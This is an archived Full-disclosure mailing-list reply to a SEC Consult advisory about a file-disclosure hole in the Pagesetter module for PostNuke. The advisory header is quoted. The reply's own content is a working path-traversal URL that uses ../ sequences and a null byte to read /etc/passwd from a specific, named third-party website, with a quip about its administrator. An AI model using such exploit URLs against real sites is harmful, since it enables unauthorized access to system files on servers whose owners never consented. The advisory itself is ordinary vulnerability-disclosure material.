Search the archives!
[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
[Full-disclosure] SEC Consult SA-20070226-0 :: File Disclosure in Pagesetter for PostNuke
- From: matthew.flaschen at gatech.edu (Matthew Flaschen)
- Subject: [Full-disclosure] SEC Consult SA-20070226-0 :: File Disclosure in Pagesetter for PostNuke
- Date: Tue, 27 Feb 2007 04:02:05 -0500
research at sec-consult.com wrote: > SEC Consult Security Advisory 20070226-0 > ======================================================================= > title: File Disclosure in Pagesetter for PostNuke > program: Pagesetter page creation module > vulnerable version: 6.2.0 > 6.3.0 beta 5 > impact: high > homepage: http://www.elfisk.dk > found: 2006-11-21 > by: D. Matscheko / SEC-CONSULT / > www.sec-consult.com > ======================================================================= > > vendor description: > --------------- > > Pagesetter is a publishing module that allows the PostNuke users to > create web pages from structured data, with the data structure and > output templates defined by the PostNuke administrator. > > [Source: http://www.elfisk.dk] > I think brendanb's going to be busy. http://www.nesco.com.au/index.php?module=Pagesetter&type=file&func=preview&id=../../../../../../../../../etc/passwd%00 -------------- next part -------------- A non-text attachment was scrubbed... Name: signature.asc Type: application/pgp-signature Size: 254 bytes Desc: OpenPGP digital signature Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20070227/2336be37/attachment.bin
- References:
- [Full-disclosure] SEC Consult SA-20070226-0 :: File Disclosure in Pagesetter for PostNuke
- From: research at sec-consult.com
- [Full-disclosure] SEC Consult SA-20070226-0 :: File Disclosure in Pagesetter for PostNuke
- Prev by Date: [Full-disclosure] Extracting files from SMB packet captures
- Next by Date: [Full-disclosure] Extracting files from SMB packet captures
- Previous by thread: [Full-disclosure] SEC Consult SA-20070226-0 :: File Disclosure in Pagesetter for PostNuke
- Next by thread: [Full-disclosure] WordPress AdminPanel CSRF/XSS - 0day
- Index(es):